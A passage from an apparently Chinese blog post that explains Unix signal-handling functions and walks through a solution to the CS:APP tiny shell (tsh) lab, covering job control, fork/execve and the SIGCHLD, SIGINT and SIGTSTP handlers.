SIG_BLOCK 在本进程的阻塞列表中，添加 set 指向的阻塞列表
SIG_UNBLOCK 在本进程的阻塞列表中，删除 set 指向的阻塞列表
SIG_SETMASK 将目前的阻塞列表设成参数 set 指定的阻塞列表，如果参数 oset 不是 NULL ，那么目前的阻塞列表会由此指针返回（存储在 oset 中）

1	int sigpending(sigset_t set); / 代办(发出但没有没处理) */

将被阻塞的信号中 “停留在待处理状态” 的一组信号，写到参数 set 指向的信号集中，成功调用返回 0，否则返回 -1，并设置 errno 表明错误原因（获取被设置为SIG_BLOCK的信号集）

1	int sigsuspend(const sigset_t sigmask); / 挂起 */

通过将进程的屏蔽字替换为由参数 sigmask 给出的信号集，然后挂起进程的执行（在一个原子操作中先恢复信号屏蔽字，然后使进程休眠），如果接收到信号终止了程序，sigsuspend 就不会返回，如果接收到的信号没有终止程序，sigsuspend 就返回 -1，并将 errno 设置为 EINTR

// 注意操作的先后顺序，是先替换再挂起程序的执行

另外还有一个关键的结构体，以及其同名函数：

#include <signal.h>

struct sigaction
{
    void (*sa_handler) (int); // 函数指针(hook)
    sigset_t sa_mask; // 指定在信号处理函数执行期间需要被屏蔽的信号
    int sa_flags;
    void (*sa_restorer) (void);
}

int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact)

sa_handler ：代表新的信号处理函数
sa_mask ：用来设置在处理该信号时暂时将 sa_mask 指定的信号搁置
sa_flags ：用来设置信号处理的其他相关操作
sa_restorer ：此参数没有使用

函数 sigaction 会依参数 signum 指定的信号编号来设置该信号的处理函数，参数 signum 可以指定 SIGKILL 和 SIGSTOP 以外的所有信号

例子：

#include <stdio.h>
#include <signal.h>
#include <unistd.h>
 
void handler(int sig)
{
    printf("Handle the signal %d\n", sig);
}
 
int main(int argc, char **argv)
{	/* sigset_t类型专门用于定义信号集 */
    sigset_t sigset;    // 用于记录屏蔽字
    sigset_t ign;       // 用于记录被阻塞(屏蔽)的信号集
    struct sigaction act; 
 
    // 清空信号集
    sigemptyset(&sigset);
    sigemptyset(&ign);
 
    // 向信号集中添加 SIGINT
    sigaddset(&sigset, SIGINT);
 
    // 设置处理函数 和 信号集
    act.sa_handler = handler;
    sigemptyset(&act.sa_mask);
    act.sa_flags = 0;
    sigaction(SIGINT, &act, 0); /* 关联信号的处理函数 */
 
    printf("Wait the signal SIGNAL...\n");
    pause();
 
    // 设置进程屏蔽字, 在本例中为屏蔽 SIGINT
    sigprocmask(SIG_SETMASK, &sigset, 0);
    /* SIG_SETMASK:用sigset中的屏蔽字来替代该进程的信号屏蔽字 */
    printf("Please press Ctrl + C in 10 seconds...\n"); /* SIGINT已经被屏蔽 */
    sleep(10);
 
    // 测试 SIGINT 是否被屏蔽
    sigpending(&ign); /* 获取被阻塞的信号集(相当于执行:ign=sigset) */
    if (sigismember(&ign, SIGINT)) /* 检查屏蔽 */
    {
        printf("The SIGINT signal has ignored\n");
    }
 
    // 从信号集中删除信号 SIGINT
    sigdelset(&sigset, SIGINT);
    printf("Wait the signal SIGINT...\n");
 
    // 将进程的屏蔽字重新设置, 即取消对 SIGINT 的屏蔽
    // 并挂起进程
    sigsuspend(&sigset); /* 和sigprocmask(SIG_SETMASK, &sigset, 0)效果类似 */
 
    printf("The app will exit in 5 secondes!\n");
    sleep(5);
 
 	/* 由于先前的SIGINT信号停留在待处理状态，而现在进程已经不再阻塞该信号 */
 	/* 所以进程马上对该信号进行处理，从而在最后 */
 	/* 你不用输入 Ctrl+C 也会出现后面的处理语句 */
    return 0;
}

➜  [/home/ywhkkx/桌面] ./test
Wait the signal SIGNAL...
^CHandle the signal 2
Please press Ctrl + C in 10 seconds... # SIGINT 被终止了10秒
^C
^C
^C
^C
The SIGINT signal has ignored
Wait the signal SIGINT...
Handle the signal 2 # 设置的处理程序生效
The app will exit in 5 secondes!

实验要求

tsh 的提示符为tsh>
用户的输入分为第一个的name和后面的参数，之间以一个或多个空格隔开，如果name是一个tsh 内置的命令，那么 tsh 应该马上处理这个命令然后等待下一个输入，否则，tsh 应该假设name是一个路径上的可执行文件，并在一个子进程中运行这个文件（这也称为一个工作、job）
tsh 不需要支持管道和重定向
如果用户输入ctrl-c (ctrl-z)，那么SIGINT (SIGTSTP) 信号应该被送给每一个在前台进程组中的进程，如果没有进程，那么这两个信号应该不起作用
如果一个命令以“&”结尾，那么tsh应该将它们放在后台运行，否则就放在前台运行（并等待它的结束）
每一个工作（job）都有一个正整数PID或者job ID（JID）JID通过”%”前缀标识符表示，例如，“%5”表示JID为5的工作，而“5”代笔PID为5的进程
tsh 应该有如下内置命令：
- quit: 退出当前shell
- jobs: 列出所有后台运行的工作
- bg : 这个命令将会向代表的工作发送SIGCONT信号并放在后台运行，可以是一个PID也可以是一个JID
- fg : 这个命令会向代表的工作发送SIGCONT信号并放在前台运行，可以是一个PID也可以是一个JID
tsh 应该回收（reap）所有僵尸子进程，如果一个工作是因为收到了一个它没有捕获的（没有按照信号处理函数）而终止的，那么tsh应该输出这个工作的PID和这个信号的相关描述

解析已有代码

下面是实验已经给出的代码：

/*
 * tsh - A tiny shell program with job control
 *
 * <Put your name and login ID here>
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

 /* Misc manifest constants */
#define MAXLINE    1024   /* max line size */
#define MAXARGS     128   /* max args on a command line */
#define MAXJOBS      16   /* max jobs at any point in time */
#define MAXJID    1<<16   /* max job ID */

/* Job states */
#define UNDEF 0 /* undefined */
#define FG 1    /* running in foreground */
#define BG 2    /* running in background */
#define ST 3    /* stopped */

/*
 * Jobs states: FG (foreground), BG (background), ST (stopped)
 * Job state transitions and enabling actions:
 *     FG -> ST  : ctrl-z
 *     ST -> FG  : fg command
 *     ST -> BG  : bg command
 *     BG -> FG  : fg command
 * At most 1 job can be in the FG state.
 */

 /* Global variables */
extern char** environ;      /* defined in libc */
char prompt[] = "tsh> ";    /* command line prompt (DO NOT CHANGE) */
int verbose = 0;            /* if true, print additional output */
int nextjid = 1;            /* next job ID to allocate */
char sbuf[MAXLINE];         /* for composing sprintf messages */

struct job_t {              /* The job struct */
    pid_t pid;              /* job PID */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line */
};
struct job_t jobs[MAXJOBS]; /* The job list */
/* End global variables */


/* Function prototypes */

/* Here are the functions that you will implement */
void eval(char* cmdline);
int builtin_cmd(char** argv);
void do_bgfg(char** argv);
void waitfg(pid_t pid);

void sigchld_handler(int sig);
void sigtstp_handler(int sig);
void sigint_handler(int sig);

/* Here are helper routines that we've provided for you */
int parseline(const char* cmdline, char** argv);
void sigquit_handler(int sig);

void clearjob(struct job_t* job);
void initjobs(struct job_t* jobs);
int maxjid(struct job_t* jobs);
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline);
int deletejob(struct job_t* jobs, pid_t pid);
pid_t fgpid(struct job_t* jobs);
struct job_t* getjobpid(struct job_t* jobs, pid_t pid);
struct job_t* getjobjid(struct job_t* jobs, int jid);
int pid2jid(pid_t pid);
void listjobs(struct job_t* jobs);

void usage(void);
void unix_error(char* msg);
void app_error(char* msg);
typedef void handler_t(int);
handler_t* Signal(int signum, handler_t* handler);

/*
 * main - The shell's main routine
 */
int main(int argc, char** argv)
{
    char c;
    char cmdline[MAXLINE];
    int emit_prompt = 1; /* emit prompt (default) */

    /* Redirect stderr to stdout (so that driver will get all output
     * on the pipe connected to stdout) */
    dup2(1, 2);

    /* Parse the command line */
    while ((c = getopt(argc, argv, "hvp")) != EOF) {
        switch (c) {
        case 'h':             /* print help message */
            usage();
            break;
        case 'v':             /* emit additional diagnostic info */
            verbose = 1;
            break;
        case 'p':             /* don't print a prompt */
            emit_prompt = 0;  /* handy for automatic testing */
            break;
        default:
            usage();
        }
    }

    /* Install the signal handlers */

    /* These are the ones you will need to implement */
    Signal(SIGINT, sigint_handler);   /* ctrl-c */
    Signal(SIGTSTP, sigtstp_handler);  /* ctrl-z */
    Signal(SIGCHLD, sigchld_handler);  /* Terminated or stopped child */

    /* This one provides a clean way to kill the shell */
    Signal(SIGQUIT, sigquit_handler);

    /* Initialize the job list */
    initjobs(jobs);

    /* Execute the shell's read/eval loop */
    while (1) {

        /* Read command line */
        if (emit_prompt) {
            printf("%s", prompt);
            fflush(stdout);
        }
        if ((fgets(cmdline, MAXLINE, stdin) == NULL) && ferror(stdin))
            app_error("fgets error");
        if (feof(stdin)) { /* End of file (ctrl-d) */
            fflush(stdout);
            exit(0);
        }

        /* Evaluate the command line */
        eval(cmdline);
        fflush(stdout);
        fflush(stdout);
    }

    exit(0); /* control never reaches here */
}

/*
 * eval - Evaluate the command line that the user has just typed in
 *
 * If the user has requested a built-in command (quit, jobs, bg or fg)
 * then execute it immediately. Otherwise, fork a child process and
 * run the job in the context of the child. If the job is running in
 * the foreground, wait for it to terminate and then return.  Note:
 * each child process must have a unique process group ID so that our
 * background children don't receive SIGINT (SIGTSTP) from the kernel
 * when we type ctrl-c (ctrl-z) at the keyboard.
*/
void eval(char* cmdline)
{
    return;
}

/*
 * parseline - Parse the command line and build the argv array.
 *
 * Characters enclosed in single quotes are treated as a single
 * argument.  Return true if the user has requested a BG job, false if
 * the user has requested a FG job.
 */
int parseline(const char* cmdline, char** argv)
{
    static char array[MAXLINE]; /* holds local copy of command line */
    char* buf = array;          /* ptr that traverses command line */
    char* delim;                /* points to first space delimiter */
    int argc;                   /* number of args */
    int bg;                     /* background job? */

    strcpy(buf, cmdline);
    buf[strlen(buf) - 1] = ' ';  /* replace trailing '\n' with space */
    while (*buf && (*buf == ' ')) /* ignore leading spaces */
        buf++;

    /* Build the argv list */
    argc = 0;
    if (*buf == '\'') {
        buf++;
        delim = strchr(buf, '\'');
    }
    else {
        delim = strchr(buf, ' ');
    }

    while (delim) {
        argv[argc++] = buf;
        *delim = '\0';
        buf = delim + 1;
        while (*buf && (*buf == ' ')) /* ignore spaces */
            buf++;

        if (*buf == '\'') {
            buf++;
            delim = strchr(buf, '\'');
        }
        else {
            delim = strchr(buf, ' ');
        }
    }
    argv[argc] = NULL;

    if (argc == 0)  /* ignore blank line */
        return 1;

    /* should the job run in the background? */
    if ((bg = (*argv[argc - 1] == '&')) != 0) {
        argv[--argc] = NULL;
    }
    return bg;
}

/*
 * builtin_cmd - If the user has typed a built-in command then execute
 *    it immediately.
 */
int builtin_cmd(char** argv)
{
    return 0;     /* not a builtin command */
}

/*
 * do_bgfg - Execute the builtin bg and fg commands
 */
void do_bgfg(char** argv)
{
    return;
}

/*
 * waitfg - Block until process pid is no longer the foreground process
 */
void waitfg(pid_t pid)
{
    return;
}

/*****************
 * Signal handlers
 *****************/

 /*
  * sigchld_handler - The kernel sends a SIGCHLD to the shell whenever
  *     a child job terminates (becomes a zombie), or stops because it
  *     received a SIGSTOP or SIGTSTP signal. The handler reaps all
  *     available zombie children, but doesn't wait for any other
  *     currently running children to terminate.
  */
void sigchld_handler(int sig)
{
    return;
}

/*
 * sigint_handler - The kernel sends a SIGINT to the shell whenver the
 *    user types ctrl-c at the keyboard.  Catch it and send it along
 *    to the foreground job.
 */
void sigint_handler(int sig)
{
    return;
}

/*
 * sigtstp_handler - The kernel sends a SIGTSTP to the shell whenever
 *     the user types ctrl-z at the keyboard. Catch it and suspend the
 *     foreground job by sending it a SIGTSTP.
 */
void sigtstp_handler(int sig)
{
    return;
}

/*********************
 * End signal handlers
 *********************/

 /***********************************************
  * Helper routines that manipulate the job list
  **********************************************/

  /* clearjob - Clear the entries in a job struct */
void clearjob(struct job_t* job) {
    job->pid = 0;
    job->jid = 0;
    job->state = UNDEF;
    job->cmdline[0] = '\0';
}

/* initjobs - Initialize the job list */
void initjobs(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        clearjob(&jobs[i]);
}

/* maxjid - Returns largest allocated job ID */
int maxjid(struct job_t* jobs)
{
    int i, max = 0;

    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid > max)
            max = jobs[i].jid;
    return max;
}

/* addjob - Add a job to the job list */
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline)
{
    int i;

    if (pid < 1)
        return 0;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid == 0) {
            jobs[i].pid = pid;
            jobs[i].state = state;
            jobs[i].jid = nextjid++;
            if (nextjid > MAXJOBS)
                nextjid = 1;
            strcpy(jobs[i].cmdline, cmdline);
            if (verbose) {
                printf("Added job [%d] %d %s\n", jobs[i].jid, jobs[i].pid, jobs[i].cmdline);
            }
            return 1;
        }
    }
    printf("Tried to create too many jobs\n");
    return 0;
}

/* deletejob - Delete a job whose PID=pid from the job list */
int deletejob(struct job_t* jobs, pid_t pid)
{
    int i;

    if (pid < 1)
        return 0;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid == pid) {
            clearjob(&jobs[i]);
            nextjid = maxjid(jobs) + 1;
            return 1;
        }
    }
    return 0;
}

/* fgpid - Return PID of current foreground job, 0 if no such job */
pid_t fgpid(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].state == FG)
            return jobs[i].pid;
    return 0;
}

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t* getjobpid(struct job_t* jobs, pid_t pid) {
    int i;

    if (pid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid)
            return &jobs[i];
    return NULL;
}

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t* getjobjid(struct job_t* jobs, int jid)
{
    int i;

    if (jid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid == jid)
            return &jobs[i];
    return NULL;
}

/* pid2jid - Map process ID to job ID */
int pid2jid(pid_t pid)
{
    int i;

    if (pid < 1)
        return 0;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid) {
            return jobs[i].jid;
        }
    return 0;
}

/* listjobs - Print the job list */
void listjobs(struct job_t* jobs)
{
    int i;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid != 0) {
            printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
            switch (jobs[i].state) {
            case BG:
                printf("Running ");
                break;
            case FG:
                printf("Foreground ");
                break;
            case ST:
                printf("Stopped ");
                break;
            default:
                printf("listjobs: Internal error: job[%d].state=%d ",
                    i, jobs[i].state);
            }
            printf("%s", jobs[i].cmdline);
        }
    }
}
/******************************
 * end job list helper routines
 ******************************/


 /***********************
  * Other helper routines
  ***********************/

  /*
   * usage - print a help message
   */
void usage(void)
{
    printf("Usage: shell [-hvp]\n");
    printf("   -h   print this message\n");
    printf("   -v   print additional diagnostic information\n");
    printf("   -p   do not emit a command prompt\n");
    exit(1);
}

/*
 * unix_error - unix-style error routine
 */
void unix_error(char* msg)
{
    fprintf(stdout, "%s: %s\n", msg, strerror(errno));
    exit(1);
}

/*
 * app_error - application-style error routine
 */
void app_error(char* msg)
{
    fprintf(stdout, "%s\n", msg);
    exit(1);
}

/*
 * Signal - wrapper for the sigaction function
 */
handler_t* Signal(int signum, handler_t* handler)
{
    struct sigaction action, old_action;

    action.sa_handler = handler;
    sigemptyset(&action.sa_mask); /* block sigs of type being handled */
    action.sa_flags = SA_RESTART; /* restart syscalls if possible */

    if (sigaction(signum, &action, &old_action) < 0)
        unix_error("Signal error");
    return (old_action.sa_handler);
}

/*
 * sigquit_handler - The driver program can gracefully terminate the
 *    child shell by sending it a SIGQUIT signal.
 */
void sigquit_handler(int sig)
{
    printf("Terminating after receipt of SIGQUIT signal\n");
    exit(1);
}

接下来就一个一个分析已有的函数（不包括 main）

Parseline

1	int main(int argc, char** argv)

argv[]：表示的是一个指针数组，一共有 argc 个元素，其中存放的是指向每一个参数的指针

argc：参数个数

int parseline(const char* cmdline, char** argv)
{ 
    static char array[MAXLINE]; /* holds local copy of command line */
    char* buf = array;          /* ptr that traverses command line */
    char* delim;                /* points to first space delimiter */
    int argc;                   /* number of args */
    int bg;                     /* background job? */

    strcpy(buf, cmdline);
    buf[strlen(buf) - 1] = ' ';  /* replace trailing '\n' with space */
    while (*buf && (*buf == ' ')) /* ignore leading spaces */
        buf++;

    /* Build the argv list */
    argc = 0;
    if (*buf == '\'') { // 转移符号,用于获取" ' "
        buf++;
        delim = strchr(buf, '\'');
    }
    else {
        delim = strchr(buf, ' ');
    }

    while (delim) {
        argv[argc++] = buf;
        *delim = '\0';
        buf = delim + 1;
        while (*buf && (*buf == ' ')) /* ignore spaces */
            buf++;

        if (*buf == '\'') {
            buf++;
            delim = strchr(buf, '\'');
        }
        else {
            delim = strchr(buf, ' ');
        }
    }
    argv[argc] = NULL;

    if (argc == 0)  /* ignore blank line */
        return 1;

    /* should the job run in the background? */
    if ((bg = (*argv[argc - 1] == '&')) != 0) {
        argv[--argc] = NULL;
    }
    return bg;
}

parseline 函数解析了以空格分隔的命令行参数（跳过所有空格和单引号，获取其中的有效指令），并构造最终会传递给 execve 的 argv 向量

// ‘&’ 表示后台运行，parseline 函数把是否在后台运行的信息存储在bg中，并返回

Struct job_t

struct job_t {              /* The job struct */
    pid_t pid;              /* job PID (进程ID) */
    int jid;                /* job ID [1, 2, ...] (任务ID) */
    int state;              /* UNDEF, BG, FG, or ST (任务状态) */
    char cmdline[MAXLINE];  /* command line (指令行) */
};
struct job_t jobs[MAXJOBS]; /* The job list */

全局结构体 job_t 是与“任务”有关的结构体

基于它，出现了以下的函数：

/* clearjob - Clear the entries in a job struct */
void clearjob(struct job_t* job) {
    job->pid = 0;
    job->jid = 0;
    job->state = UNDEF;
    job->cmdline[0] = '\0';
}

清空一个任务

/* initjobs - Initialize the job list */
void initjobs(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        clearjob(&jobs[i]);
}

任务初始化

/* maxjid - Returns largest allocated job ID */
int maxjid(struct job_t* jobs)
{
    int i, max = 0;

    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid > max)
            max = jobs[i].jid;
    return max;
}

获取最大的任务ID

/* addjob - Add a job to the job list */
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline)
{
    int i;

    if (pid < 1)
        return 0;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid == 0) {
            jobs[i].pid = pid;
            jobs[i].state = state;
            jobs[i].jid = nextjid++;
            if (nextjid > MAXJOBS)
                nextjid = 1;
            strcpy(jobs[i].cmdline, cmdline);
            if (verbose) {
                printf("Added job [%d] %d %s\n", jobs[i].jid, jobs[i].pid, jobs[i].cmdline);
            }
            return 1;
        }
    }
    printf("Tried to create too many jobs\n");
    return 0;
}

添加一个新任务

/* deletejob - Delete a job whose PID=pid from the job list */
int deletejob(struct job_t* jobs, pid_t pid)
{
    int i;

    if (pid < 1)
        return 0;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid == pid) {
            clearjob(&jobs[i]);
            nextjid = maxjid(jobs) + 1;
            return 1;
        }
    }
    return 0;
}

删除一个任务

/* fgpid - Return PID of current foreground job, 0 if no such job */
pid_t fgpid(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].state == FG)
            return jobs[i].pid;
    return 0;
}

返回某个任务的 进程ID

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t* getjobpid(struct job_t* jobs, pid_t pid) {
    int i;

    if (pid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid)
            return &jobs[i];
    return NULL;
}

根据 进程ID 获取 任务地址

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t* getjobjid(struct job_t* jobs, int jid)
{
    int i;

    if (jid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid == jid)
            return &jobs[i];
    return NULL;
}

根据 任务ID 获取 任务地址

/* pid2jid - Map process ID to job ID */
int pid2jid(pid_t pid)
{
    int i;

    if (pid < 1)
        return 0;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid) {
            return jobs[i].jid;
        }
    return 0;
}

根据 进程ID 获取 任务ID

/* listjobs - Print the job list */
void listjobs(struct job_t* jobs)
{
    int i;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid != 0) {
            printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
            switch (jobs[i].state) {
            case BG:
                printf("Running ");
                break;
            case FG:
                printf("Foreground ");
                break;
            case ST:
                printf("Stopped ");
                break;
            default:
                printf("listjobs: Internal error: job[%d].state=%d ",
                    i, jobs[i].state);
            }
            printf("%s", jobs[i].cmdline);
        }
    }
}

打印任务的 “信息”，“状态” 和 “命令行”

Signal

对于程序的信号处理，先给出了 Signal：

/*
 * Signal - wrapper for the sigaction function
 */
handler_t* Signal(int signum, handler_t* handler)
{
    struct sigaction action, old_action;

    action.sa_handler = handler;
    sigemptyset(&action.sa_mask); /* block sigs of type being handled */
    action.sa_flags = SA_RESTART; /* restart syscalls if possible */

    if (sigaction(signum, &action, &old_action) < 0)
        unix_error("Signal error");
    return (old_action.sa_handler);
}

总而言之，Signal 用于初始化信号处理机制，通过调用 sigemptyset 来清空 sa_mask，通过调用 sigaction 把特定信号和特定处理程序绑定

最后给出了几个处理程序：

void unix_error(char* msg)
{
    fprintf(stdout, "%s: %s\n", msg, strerror(errno));
    exit(1);
}

void app_error(char* msg)
{
    fprintf(stdout, "%s\n", msg);
    exit(1);
}

void sigquit_handler(int sig)
{
    printf("Terminating after receipt of SIGQUIT signal\n");
    exit(1);
}

其他的处理程序就要自己完成了

编写目标代码

补全tsh.c中剩余的代码：

void eval(char *cmdline)：解析并执行命令
int builtin_cmd(char **argv)：检测命令是否为内置命令quit、fg、bg、jobs
void do_bgfg(char **argv)：实现bg、fg命令
void waitfg(pid_t pid)：等待前台命令执行完成
void sigchld_handler(int sig)：处理SIGCHLD信号，即子进程停止或终止
void sigint_handler(int sig)：处理SIGINT信号，即来自键盘的中断ctrl-c
void sigtstp_handler(int sig)：处理SIGTSTP信号，即终端停止信号ctrl-z

Eval

void eval(char* cmdline)：解析并执行命令

void eval(char* cmdline)
{
    char* argv[MAXARGS] = { NULL };
    int FG_BG = parseline(cmdline, argv) + 1; // 获取命令存储到argv
    if (argv[0] == NULL)    return;

    if (!builtin_cmd(argv)) // 检查是否为内置命令
    {
        // 在函数内部加阻塞列表，不然之后可能会出现不痛不痒的bug
        sigset_t mask_all, mask_one, prev_one; // 定义信号集
        sigfillset(&mask_all); /* 添加所有信号到 mask_all */
        sigemptyset(&mask_one); /* 清空 mask_one */
        sigemptyset(&prev_one); /* 清空 prev_one */
        sigaddset(&mask_one, SIGCHLD); /* 添加 SIGCHLD 到 mask_one */

        pid_t fpid;
        sigprocmask(SIG_BLOCK, &mask_one, &prev_one); /* 防止子进程被调度 */
        fpid = fork(); /* 获取新进程 */
        if (!fpid)
        {
            // 子进程继承了父进程的阻塞表，也要解除阻塞(避免收不到它本身的子进程的信号)
            setpgid(0, 0); 
            sigprocmask(SIG_SETMASK, &prev_one, NULL);
            if (execve(argv[0], argv, environ) == -1) /* execve执行命令 */
            {
                printf("%s: Command not found\n", argv[0]);
                exit(0);
            }
        }
        else
        {
            // 依然是加塞，阻塞所有信号
            sigprocmask(SIG_BLOCK, &mask_all, NULL);
            addjob(jobs, fpid, FG_BG, cmdline);
            sigprocmask(SIG_SETMASK, &mask_one, NULL);

            // 后台则打印，前台则等待子进程结束
            if (FG_BG == FG)  waitfg(fpid);
            else
            {
                sigprocmask(SIG_SETMASK, &mask_all, NULL);
                int insert_jid = pid2jid(fpid);
                if (FG_BG == BG)	printf("[%d] (%d) %s", insert_jid, fpid, cmdline);
            }
        }
        sigprocmask(SIG_SETMASK, &prev_one, NULL);
    }
    return;
}

builtin_cmd

int builtin_cmd(char **argv)：检查 cmdline 是否为内置命令，并实现 jobs，quit

int builtin_cmd(char** argv)
{
    // 判断是不是内置函数，不是就返回，注意内置命令有要继续操作的一定
    // 要返回1，不是内置函数就是0

    if (!strcmp(argv[0], "quit"))
        exit(0);
    else if (!strcmp(argv[0], "jobs"))
    {
        listjobs(jobs); /* 打印jobs */
        return 1;
    }
    else if (!strcmp(argv[0], "bg") || !strcmp(argv[0], "fg"))
    {
        do_bgfg(argv); /* 执行bg,fg指令 */
        return 1;
    }
    // 对单独的&不处理
    else if (!strcmp(argv[0], "&"))
    {
        return 1;
    }
    return 0;     /* not a builtin command */
}

do_bgfg

实现 bg命令 (让后台工作继续在后台执行) 和 fg命令 (把后台命令恢复在前台执行)

void do_bgfg(char** argv)
{
    // 没有参数，其实应该也加上判断参数个数的语句才比较完整
    if (argv[1] == NULL)
    {
        printf("%s command requires PID or %%jobid argument\n", argv[0]);
        return;
    }

    struct job_t* job;
    int id;

    // bg %5 和 bg 5 不一样，一个是对一个任务操作，另一个是对进程操作
    // 而任务代表了一个进程组

    // 要根据tshref的样例输出看有多少种情况

    // 读到jid
    if (sscanf(argv[1], "%%%d", &id) > 0)
    {
        job = getjobjid(jobs, id); /* 对任务操作 */
        if (job == NULL)
        {
            printf("%%%d: No such job\n", id);
            return;
        }
    }
    // 读到pid
    else if (sscanf(argv[1], "%d", &id) > 0)
    {
        job = getjobpid(jobs, id); /* 对进程操作 */ 
        if (job == NULL)
        {
            printf("(%d): No such process\n", id);
            return;
        }
    }
    // 格式错误
    else
    {
        printf("%s: argument must be a PID or %%jobid\n", argv[0]);
        return;
    }
    // 因为子进程单独成组，所以kill很方便
    if (!strcmp(argv[0], "bg"))
    {
        // 进程组是负数pid，发送信号并更改状态
        kill(-(job->pid), SIGCONT);
        job->state = BG;
        printf("[%d] (%d) %s", job->jid, job->pid, job->cmdline);
    }
    else
    {
        // 如果fg后台进程，那么将它的状态转为前台进程，然后等待它终止
        kill(-(job->pid), SIGCONT);
        job->state = FG;
        waitfg(job->pid);
    }

    return;
}

waitfg

等待前台命令执行完成

void waitfg(pid_t pid)
{
    // 进程回收不需要做，只要等待前台进程就行
    sigset_t mask_temp;
    sigemptyset(&mask_temp);
    // 设定不阻塞任何信号
    // 其实可以直接sleep显式等待信号
    while (fgpid(jobs) > 0)
    	sigsuspend(&mask_temp);
    return;
}

sigchld_handler

SIGCHLD：告知父进程回收自己，但该信号的默认处理动作为忽略，因此父进程仍然不会去回收子进程，需要捕捉处理实现子进程的回收

void sigchld_handler(int sig) 
{
    int olderrno = errno; /* 保存旧errno */
    pid_t pid;
    int status;
    sigset_t mask_all, prev; 
    
    sigfillset(&mask_all); /* 把所有信号放入mask_all */
    while((pid = waitpid(-1, &status, WNOHANG | WUNTRACED)) > 0)
    {
        // WNOHANG | WUNTRACED 是立即返回
        // 用WIFEXITED(status)，WIFSIGNALED(status)，WIFSTOPPED(status)等来补获终止或者被停止的子进程的退出状态
    	if (WIFEXITED(status))  // 正常退出 delete
    	{
    		sigprocmask(SIG_BLOCK, &mask_all, &prev); /* 设置全阻塞 */
    		deletejob(jobs, pid); /* 删除任务 */
    		sigprocmask(SIG_SETMASK, &prev, NULL); /* 恢复信号集 */
    	}
    	else if (WIFSIGNALED(status))  // 信号退出 delete
    	{
    	    struct job_t* job = getjobpid(jobs, pid);
            sigprocmask(SIG_BLOCK, &mask_all, &prev); /* 设置全阻塞 */
            printf("Job [%d] (%d) terminated by signal %d\n", job->jid, job->pid, WTERMSIG(status));
            deletejob(jobs, pid); /* 删除任务 */
            sigprocmask(SIG_SETMASK, &prev, NULL); /* 恢复信号集 */
    	}
    	else  // 停止 只修改状态就行
    	{
            struct job_t* job = getjobpid(jobs, pid);
            sigprocmask(SIG_BLOCK, &mask_all, &prev); /* 设置全阻塞 */
            printf("Job [%d] (%d) stopped by signal %d\n", job->jid, job->pid, WSTOPSIG(status));
            job->state= ST; /* 设置任务状态为ST */
            sigprocmask(SIG_SETMASK, &prev, NULL); /* 恢复信号集 */
        }
    }
    errno = olderrno;  // 恢复
    return;
}

sigint_handler

SIGINT：程序终止(interrupt)信号，在用户键入INTR字符(通常是Ctrl-C)时发出，用于通知前台进程组终止进程

void sigint_handler(int sig) 
{
        // 向子进程发送信号即可
   	int olderrno = errno;
   	pid_t pid = fgpid(jobs);
   	if (pid != 0)
            kill(-pid, sig);
   	errno = olderrno;
   	
   	return;
}

sigtstp_handler

SIGTSTP：停止进程的运行，但该信号可以被处理和忽略，用户键入SUSP字符时(通常是Ctrl-Z)发出这个信号

void sigtstp_handler(int sig) 
{
    // 向子进程发送信号即可
    int olderrno = errno;
    pid_t pid = fgpid(jobs);
    if (pid != 0)
    	kill(-pid, sig);
    errno = olderrno;
    return;
}

完整实验代码

/*
 * tsh - A tiny shell program with job control
 *
 * <Put your name and login ID here>
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

 /* Misc manifest constants */
#define MAXLINE    1024   /* max line size */
#define MAXARGS     128   /* max args on a command line */
#define MAXJOBS      16   /* max jobs at any point in time */
#define MAXJID    1<<16   /* max job ID */

/* Job states */
#define UNDEF 0 /* undefined */
#define FG 1    /* running in foreground */
#define BG 2    /* running in background */
#define ST 3    /* stopped */

/*
 * Jobs states: FG (foreground), BG (background), ST (stopped)
 * Job state transitions and enabling actions:
 *     FG -> ST  : ctrl-z
 *     ST -> FG  : fg command
 *     ST -> BG  : bg command
 *     BG -> FG  : fg command
 * At most 1 job can be in the FG state.
 */

 /* Global variables */
extern char** environ;      /* defined in libc */
char prompt[] = "tsh> ";    /* command line prompt (DO NOT CHANGE) */
int verbose = 0;            /* if true, print additional output */
int nextjid = 1;            /* next job ID to allocate */
